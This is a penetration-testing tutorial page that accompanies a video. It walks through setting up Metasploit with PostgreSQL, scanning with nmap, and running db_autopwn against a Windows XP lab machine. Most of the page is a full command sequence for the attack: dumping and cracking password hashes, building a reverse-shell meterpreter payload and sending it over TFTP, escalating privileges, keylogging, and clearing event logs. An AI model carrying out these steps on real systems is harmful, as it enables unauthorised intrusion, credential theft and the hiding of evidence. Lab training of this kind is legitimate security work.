Watch video on-line: http://g0tmi1k.blip.tv/file/4644349/
Download video: http://www.mediafire.com/?cyxtis1ymly84f5
What is this?
This guide shows how to setup PostgreSQL as the database to power metasploit, which then leads onto using metasploit's db_autopwn features to carry out a collection of remote exploits in an attempt to gain access to the target system(s). When/If access has been gained; it shows a few basic things afterwards, such as:
- Gathering information – OS, interfaces, privilege level, running processes, idle time, screen shoots and keylogging
- Cracking user's passwords – Finding passwords to access the system
- Gaining shell access – Then transferring meterpreter agent via TFTP
- Handling multiple sessions – Which vulnerability to interact with.
- Process migration – Move code into another process
- Privilege escalation - Attempt to gain SYSTEM level privileges.
- File management – Navigation, Down/Up-load, editing, viewing files/folders
- Program control – Execution and Killing programs
- Misc – Covering tracks and Power management
- Configure PostgreSQL database to be able to function with metasploit
- Setup metasploit to use PostgreSQL and how to connect automatically at startup
- Use nmap from metasploit to scan for target(s)
- Running db_autopwn to attempt to run a collection of remote exploit(s) on discovered target(s) (The two exploits which work were: windows/smb/ms04_011_lsass and windows/dcerpc/ms03_026_dcom)
- Dump the hash table, then by using John The Ripper break password(s)
- Using an alternative method rather than meterpreter to transfer files, TFTP (Useful if you only have shell accesses and wish to use meterpreter shell instead OR interact with another system)
- Migrating to a different process which hides backdoor from running process lists (makes it less obvious of injection and allows the backdoor to be deleted if needed. Plus if the services that were exploited didn't have interactive access to the desktop, it now would)
- Escalate Privilege which allows the attacker to gain more control over the system.
- Various commands to navigate through the file system as well as altering the file structure.
- Basic commands to collect information about the system & user.
What do I need?
- PostgreSQL – (Can be found on BackTrack 4-R2)
- Metasploit – (Can be found on BackTrack 4-R2)
- Nmap – (Can be found on BackTrack 4-R2)
- TFTPD – (Can be found on BackTrack 4-R2)
- Text Editor – (Kate can be found on BackTrack 4-R2)
Notes:Code:/etc/init.d/postgresql-8.3 start /etc/init.d/postgresql-8.3 status passwd -d postgres su postgres psql ALTER USER postgres WITH PASSWORD 'g0tmi1k'; \q passwd psql -l createdb msf psql -l exit clear msfconsole db_driver db_driver postgresql db_connect postgres:firstname.lastname@example.org/msf exit kate ~/.msf3/msfconsole.rc db_driver postgresql db_connect postgres:email@example.com/msf db_workspace -a msf clear msfconsole db_hosts db_nmap -O -sS -sV -v 192.168.0.100-110 #192.168.0.0/24 -A db_hosts db_autopwn -t -p -e -b #db_autopwn -t -x -e -r -T 30 clear sessions -l -v sessions -i 1 sysinfo ipconfig getuid hashdump kate -> paste -> Save: ~/hashdump cd /pentest/passwords/jtr/ ./john ~/hashdump clear start-tftpd cd /tmp ifconfig msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.33 X > g0tmi1k.exe ls background clear search handler use multi/handler show options exploit -j sessions -i 1 shell cd C:\ tftp *-i 192.168.0.105 GET g0tmi1k.exe g0tmi1k.exe exit sessions -l -v sessions -i 3 getuid ps migrate [Explorer.EXE] getuid getsystem #getprivs if not enabled, migrate if that fails - and try again getuid pwd cd C:/ ls mkdir g0tmi1k ls cd g0tmi1k ls pwd getwd lpwd echo have you... > /tmp/message.txt upload /tmp/message.txt C:/g0tmi1k/ ls edit message.txt A -> g0tmi1k? -> esc -> :wq cat C:/g0tmi1k/message.txt download message.txt /tmp/ execute -*f notepad -a message.txt del message.txt ls cd \ ls rmdir g0tmi1k ls ps kill [notepad] idletime screenshot run keylogrecorder mail.google.com thisismyusername thisismypassword clearev shutdown exit kate -> open -> /path/to/key/logger/file/which/
- I had deleted postgres's password before recording the video. This is the reason why it didn't prompt me for "(Current) UNIX password:". The solution would be to type "passwd -d postgres" before "su postgres". The commands have been updated to reflex this.
- Metasploit can do A LOT more – this is a brief insight to it
- db_autopwn may not work on your chosen target - Target in the video is running Windows XP SP1
- db_autopwn is “noisy” as it tries a mass of exploits.
- Windows XP by default has a TFTP client built into it, Windows 7 doesn't.
Song: Luke Solomon – Liquid & Bungalove - Saturday Song
Video length: 10:28
Capture length: 25:01